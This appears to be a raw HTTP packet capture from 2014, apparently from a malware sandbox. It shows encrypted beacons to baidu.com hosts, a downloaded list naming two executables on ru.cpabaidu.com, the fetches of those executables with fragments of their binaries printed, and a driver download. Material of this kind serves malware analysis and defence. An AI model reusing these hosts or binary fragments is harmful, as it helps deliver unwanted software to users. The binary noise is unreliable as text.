
Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......8....S........o.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......... @.....$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......(s..,....D..{...HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......8....S........o.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......... @.....$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(....

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.....Q.C....E..R..7yZ......c..fKM...1v..b$b....J........-.

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......~q.W.|4..^..sI.tHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......~q.W.|4..^..sI.t..

GET /baidu/test.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ru.cpabaidu.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Fri, 31 Oct 2014 10:31:26 GMT

Accept-Ranges: bytes

ETag: "a7e154d3f5f4cf1:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Thu, 06 Nov 2014 06:06:57 GMT

Content-Length: 130

hXXp://ru.cpabaidu.com/baidu/F1023_s_30803.exe F1023_s_30803.exe..http://ru.cpabaidu.com/baidu/G1023_s_70904.exe G1023_s_70904.exe....

GET /baidu/F1023_s_30803.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ru.cpabaidu.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 31 Oct 2014 10:21:12 GMT

Accept-Ranges: bytes

ETag: "7e31f764f4f4cf1:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Thu, 06 Nov 2014 06:06:57 GMT

Content-Length: 17532120

MZ......................@...............5....j..........................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@...........................'.....=$;*..@.................................d.........&..h..........Pk...............................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc....h....&..j..................@..@.reloc.......p'.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

<<< skipped >>>

GET /baidu/G1023_s_70904.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ru.cpabaidu.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 31 Oct 2014 10:26:22 GMT

Accept-Ranges: bytes

ETag: "dd0e71df5f4cf1:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Thu, 06 Nov 2014 06:07:50 GMT

Content-Length: 30855896

MZ......................@...............6G).............................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@.......................... *......H:*..@.................................d.........$..I..........P................................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc....I....$..J..................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 222

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..j:...i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.8.@.H.P.X...` ...X..M(...jI.i......vZ......#...F..?P$q...y.....3......B..M.G...d..7.u.<.;..@.Nkb.. 0..=.....

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ......1CZMpu..<z.n..R.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ......1CZMpu..<z.n..R...

GET /client1/common/patch/32175066779/putips_wording.dat HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Fri, 28 Nov 2014 08:33:25 GMT

Date: Wed, 29 Oct 2014 08:33:25 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 452

Last-Modified: Mon, 29 Sep 2014 07:17:46 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 682497

Via: 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="putips_wording.dat"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

y........rbF.....m.{...P.?.(0sui_)....2(p..a.$.M..$..p.... ..R. T]....f.. .\.@.8..!.[|`...4..&.87R...D!)..5.r...i@..q.....'..'.oI.....M4....F..8.q..`...~d.G9.W.RC...n.......I./....O.,..k.].6..k.R.MF...i...8jO. ..Q..De._C..|&.L...|..8.`.^k)..q....d..."7.H.`...zI..r....i.*d]....}/...........s.N..]..x..u.......g.x.L.H.1.2..v....FP.... >..k...B..t...k..............c.0......r~...U....e.A.N...L~]H.......@r..............|.z.*-...P<A..w....g.x...aK...e[.{...

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(..;vk.....)._U..8R.[..)24.I.u...4$U/....K

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......=.o...ly...._....

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 166

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... .....~...U....4........V.u......X.

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............Mj...x.4`0..

GET /CSC3-2010.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: csc3-2010-crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "beb1d8b82cb8c9757d59de95e6371f01:1415221513"

Last-Modified: Wed, 05 Nov 2014 21:05:13 GMT

Date: Thu, 06 Nov 2014 06:07:35 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Connection: Transfer-Encoding

Content-Type: application/pkix-crl

00006000..0..".0..!x...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA..141105210003Z..141119210003Z0.. Z0!.....S.@.k....6..c..140730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9..130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........'u..140521222808Z0!......0..........I..130912181631Z0!....6e...~..T.......130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u......130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518121623Z0!...<%a.=.d.......O..120424164254Z0!...@.....

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(......

.]....B..w.-.....$)..O..b........

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......,........}..Ys...

GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Sun, 09 Nov 2014 10:45:45 GMT

Date: Fri, 10 Oct 2014 10:45:45 GMT

Server: nginx

Content-Type: text/xml

Content-Length: 18710

Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 2316159

Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 shiben13:5706 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="hipsClient.xml"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 78

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 134

...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M....t..........8.@.H.P.X...` ........

GET /client1/common/patch/34282863525/BDMWrench.sys HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Sat, 22 Nov 2014 17:01:21 GMT

Date: Thu, 23 Oct 2014 17:01:21 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 216648

Last-Modified: Thu, 23 Oct 2014 16:47:43 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 1170408

Via: 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 shiben14:8032 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="BDMWrench.sys"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

MZ......................@...................................p...........!..L.!This program cannot be run in DOS mode....$.........................................................................................................................................................................................................................................................................................................................................................................................................TW^.:.^.:.^.:.W...Z.:.W...S.:.^.;...:...g.Y.:...e._.:.W...G.:.W..._.:.W..._.:.Rich^.:.........................PE..L.....HT.................E..........>........=............................... ..............................................P...P.......8............ ..H#...........?..................................@............=...............................text... 8.......8.................. ..h.rdata...l...=...l...=..............@..H.data... P.......P..................@...INIT....x........................... ....rsrc...8...........................@..B.reloc... .......!..................@..B...............................................U....d.l...3..E..E.P......u..E.QP.$....E.PV......M.3.................U............l...3...$....SV.u.W3.j...$....SP..$............V.D$@P.\$ ..@>..j._h....SSSSh.@..j.j.S.D$`.D$PS.D$DP.D$PPh.....D$HP.|$\.\$`.D$h@....\$l.\$p...>..;..D$.......S.D$.P..=..S.0S.t$(..p=..;..D$.}..\$.......D$..X8.D$..X<.D$DP.D$LPWj..t$....>..;..D$........5(>..SSj@..$....P.D$,PSSS.t$4

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 78

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 134

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ........

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 230

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...`....Z..,......".....tQ..;.v.m`..;....:..W....>:....<.1...V....`,,.8...o........G.n%}-&:....^.Hb..kPOST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..lv..LPL.}a.lD..N.?X{ VvG..m....>\..F.. .p.Ky...[kM....F.POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..ybV...%`...yH&6....x7.V=.:e#.v.....$$.CV,.@.sR...<3.....POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 238

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...h........p....a.8d.......^.f@.R..I..m....{.x.!^.V.........I.....vJ.c. ...{...V......7.Qq.....{..Tf...>... POST / HTTP/1.1

Connection: Keep-Ali

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......F.1.S...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......F.1.S...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .............'.76.....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......Qh.8|.:..&_.0x.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ..................RX.THTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(....

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 230

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...`..%.w.....3. F....m..vC........J.

...FI~.k..)V.)(..Z.n [.........N6.....F...{.S'.[......Usr....qPOST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 190

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..X...j.'?.Z1...R......./..z..o..sV....)..bZ...[.. .P.B<.POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 182

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...0...7.......2..w......Zpw.7..H^.oN.....J-.K...`v3Q.POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 182

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z.......*" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...0..<..V..1..W!x3.m..r!.a...K.."....8....^fm...f..<.POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 182

Content-Type: application/octet-stream

Host:

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...........Y%\e.....2.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...........Y%\e.....2.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z.......*" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......U.!.../..c....|HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ..............U...A.[ HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z.......)" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......603..qBE...K..gHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z....... " b58974f666e28edaba3814768157053d(....

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 158

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ......|{.a....8>6.Y..,.u8f....POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(...St..T.aYH`f.7....s......`cw.:(....Y....

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ......id..=..k.p.~LV..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z.......," b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ......id..=..k.p.~LV......

GET /client1/common/patch/24946961047/dnw.xml HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Thu, 04 Dec 2014 15:53:14 GMT

Date: Tue, 04 Nov 2014 15:53:14 GMT

Server: nginx

Content-Type: text/xml

Content-Length: 165

Last-Modified: Mon, 07 Jul 2014 15:29:21 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 137687

Via: 1.0 zhjzh55:8080 (Cdn Cache Server V2.0), 1.0 tswt79:8104 (Cdn Cache Server V2.0), 1.0 jg13:1080 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="dnw.xml"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

..}..a.Pr.DN...R.x.,....*Z....R...@.9=gJbC.z....M..Z.A .A....[........oh.*Fi:....ki.c1...(.(3:...5..........}.,.U>...{{...... .]k/".}*D.?>a.#c..3.....[..9..r#.u|`.....

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 78

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 134

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ........

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 174

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(.......2o.i.n&....t..eL..o;r..m....wIn

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ......$.3.`...%...K.....

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 212

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...x......." b58974f666e28edaba3814768157053d(.........28..7

....K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ...P. y.u/)...s5.....d[....DP.)....[....)....~VtR#.R........UeN<.f!Li.......XZ..6r.[#POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 212

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...x........" b58974f666e28edaba3814768157053d(.........28..7

....K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ...P.,m............V.3...E9%.:A..y1...k.z4.

.LO....`..?.?....\......bR?....'w.....O..

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 148

